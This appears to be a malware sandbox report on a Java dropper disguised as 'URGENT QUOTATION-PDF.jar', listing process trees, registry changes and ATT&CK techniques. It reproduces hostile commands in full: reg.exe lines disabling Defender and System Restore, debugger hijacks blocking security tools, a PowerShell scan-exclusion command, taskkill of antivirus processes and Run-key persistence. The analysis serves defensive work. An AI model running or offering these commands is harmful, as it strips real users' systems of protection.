PID 428 wrote to memory of 5212	428	java.exe	355
PID 428 wrote to memory of 5308	428	java.exe	357
PID 428 wrote to memory of 5308	428	java.exe	357
PID 428 wrote to memory of 5368	428	java.exe	359
PID 428 wrote to memory of 5368	428	java.exe	359
PID 428 wrote to memory of 5552	428	java.exe	364
PID 428 wrote to memory of 5552	428	java.exe	364
PID 5552 wrote to memory of 5600	5552	cmd.exe	366
PID 5552 wrote to memory of 5600	5552	cmd.exe	366

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1144	powershell.exe
1144	powershell.exe
1144	powershell.exe

Adds Run entry to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\gwjxXxT = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\LdlkM\\lAdax.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run	java.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\gwjxXxT = "\"C:\\Users\\Admin\\Oracle\\bin\\javaw.exe\" -jar \"C:\\Users\\Admin\\LdlkM\\lAdax.class\""	java.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	java.exe

Kills process with taskkill 16 IoCs

evasion

pid	Process
4272	taskkill.exe
4980	taskkill.exe
5152	taskkill.exe
5368	taskkill.exe
3912	taskkill.exe
5068	taskkill.exe
4604	taskkill.exe
3800	taskkill.exe
4372	taskkill.exe
1108	taskkill.exe
4736	taskkill.exe
3840	taskkill.exe
4444	taskkill.exe
5212	taskkill.exe
5308	taskkill.exe
3724	taskkill.exe

Loads dropped DLL 1 IoCs

pid	Process
428	java.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
428	java.exe

Drops file in System32 directory 2 IoCs

description	ioc	Process
File created	C:\Windows\System32\vWUDs	java.exe
File opened for modification	C:\Windows\System32\vWUDs	java.exe

Views/modifies file attributes 1 TTPs 8 IoCs

evasion

Hidden Files and Directories

T1158

pid	Process
3832	attrib.exe
3880	attrib.exe
3152	attrib.exe
3960	attrib.exe
3432	attrib.exe
3428	attrib.exe
1796	attrib.exe
3660	attrib.exe

Disables use of System Restore points 1 TTPs
evasion

Inhibit System Recovery
T1490

Checks for installed software on the system 1 TTPs 38 IoCs

discovery

Query Registry

T1012

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{4A03706F-666A-4037-7777-5F2748764D10}\DisplayName	reg.exe
Key enumerated	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{26A24AE4-039D-4CA4-87B4-2F86418066F0}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 75.0 (x64 en-US)\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{f4220b74-9edd-4ded-bc8b-0342c1e164d8}\DisplayName	reg.exe
Key queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key enumerated	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\windows\currentversion\uninstall	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}\DisplayName	reg.exe
Key queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180660}\DisplayName	reg.exe
Key opened	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\software\microsoft\windows\currentversion\uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12578975-C765-4BDF-8DDC-3284BC0E855F}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}\DisplayName	reg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName	reg.exe
Key opened	\REGISTRY\MACHINE\software\microsoft\windows\currentversion\uninstall	reg.exe
Key enumerated	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{F7CAC7DF-3524-4C2D-A7DB-E16140A3D5E6}\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome\DisplayName	reg.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}\DisplayName	reg.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Uninstall\OneDriveSetup.exe\DisplayName	reg.exe

Sets file execution options in registry 2 TTPs 32 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\debugger = "svchost.exe"	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe\debugger = "svchost.exe"	reg.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe\debugger = "svchost.exe"	reg.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe

Drops desktop.ini file(s) 4 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\LdlkM\Desktop.ini	attrib.exe
File opened for modification	C:\Users\Admin\LdlkM\Desktop.ini	java.exe
File created	C:\Users\Admin\LdlkM\Desktop.ini	java.exe
File opened for modification	C:\Users\Admin\LdlkM\Desktop.ini	attrib.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\URGENT QUOTATION-PDF.jar"
1⤵
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- Adds Run entry to start application
- Loads dropped DLL
- Suspicious behavior: GetForegroundWindowSpam
- Drops file in System32 directory
- Drops desktop.ini file(s)
PID:428
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1780
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1968
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2120
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2508
- - C:\Windows\System32\Wbem\WMIC.exe
    WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path FirewallProduct Get displayName /Format:List
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2796
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\Oracle
  2⤵
  - Views/modifies file attributes
  PID:3832
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +r +s C:\Users\Admin\.ntusernt.ini
  2⤵
  - Views/modifies file attributes
  PID:3880
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\LdlkM\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:3152
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\LdlkM\Desktop.ini
  2⤵
  - Views/modifies file attributes
  - Drops desktop.ini file(s)
  PID:3960
- C:\Windows\SYSTEM32\attrib.exe
  attrib -s -r C:\Users\Admin\LdlkM
  2⤵
  - Views/modifies file attributes
  PID:3432
- C:\Windows\SYSTEM32\attrib.exe
  attrib +s +r C:\Users\Admin\LdlkM
  2⤵
  - Views/modifies file attributes
  PID:3428
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h C:\Users\Admin\LdlkM
  2⤵
  - Views/modifies file attributes
  PID:1796
- C:\Windows\SYSTEM32\attrib.exe
  attrib +h +s +r C:\Users\Admin\LdlkM\lAdax.class
  2⤵
  - Views/modifies file attributes
  PID:3660
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3572
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:1564
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:1788
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "procexp.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:1108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\LdlkM','C:\Users\Admin\AppData\Local\Temp\','C:\Users\Admin\jitsib64.dll','C:\Users\Admin\LdlkM\lib\bridj-0.7.0.jar','C:\Users\Admin\Google Chrome' -ExclusionExtension 'jar','exe','dll','txt','hta','vbs','jpg','jpeg','png','js','doc','docx','pdf','scr' -ExclusionProcess 'java.exe','javaw.exe','reg.exe','regedit.exe','tasklist.exe','netstat.exe','cmd.exe','netsh.exe','taskkill.exe'"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1144
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1232
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableConfig" /t REG_DWORD /d "1" /f
  2⤵
  PID:1288
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCuiL.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2152
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore" /v "DisableSR" /t REG_DWORD /d "1" /f
  2⤵
  PID:2120
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3836
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4088
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MsMpEng.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3640
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4012
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2744
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:8
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1052
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:1460
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\NisSrv.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2960
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ConfigSecurityPolicy.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3992
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCuiL.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3800
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\procexp.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3836
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2184
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\tshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3920
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3420
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\uninstall\OneDriveSetup.exe" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:2352
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\text2pcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3912
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rawshark.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2692
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\dumpcap.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:3000
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\capinfos.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2892
- C:\Windows\System32\reg.exe
  "C:\Windows\System32\reg.exe" add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Procmon.exe" /v debugger /t REG_SZ /d svchost.exe /f /reg:64
  2⤵
  - Sets file execution options in registry
  PID:2752
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2536
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3992
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall" /reg:32
    3⤵
    - Checks for installed software on the system
    PID:3844
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MSASCui.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3912
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2692
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:64
    3⤵
    - Checks for installed software on the system
    PID:3036
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\7-Zip" /reg:32
    3⤵
    PID:2892
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:2116
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:64
    3⤵
    PID:2752
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\AddressBook" /reg:32
    3⤵
    PID:3416
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:3824
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:64
    3⤵
    PID:1672
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Connection Manager" /reg:32
    3⤵
    PID:3392
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1552
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:64
    3⤵
    PID:3908
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DirectDrawEx" /reg:32
    3⤵
    PID:3836
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1288
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:64
    3⤵
    PID:2912
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\DXM_Runtime" /reg:32
    3⤵
    PID:1524
- C:\Windows\System32\taskkill.exe
  "C:\Windows\System32\taskkill.exe" /IM "MsMpEng.exe" /T /F
  2⤵
  - Kills process with taskkill
  PID:3724
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe
  2⤵
  PID:1788
- - C:\Windows\system32\reg.exe
    reg query "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\uninstall\Fontcore" /reg:64
    3⤵
    PID:1108
- - C:\Windows\system32\reg.exe
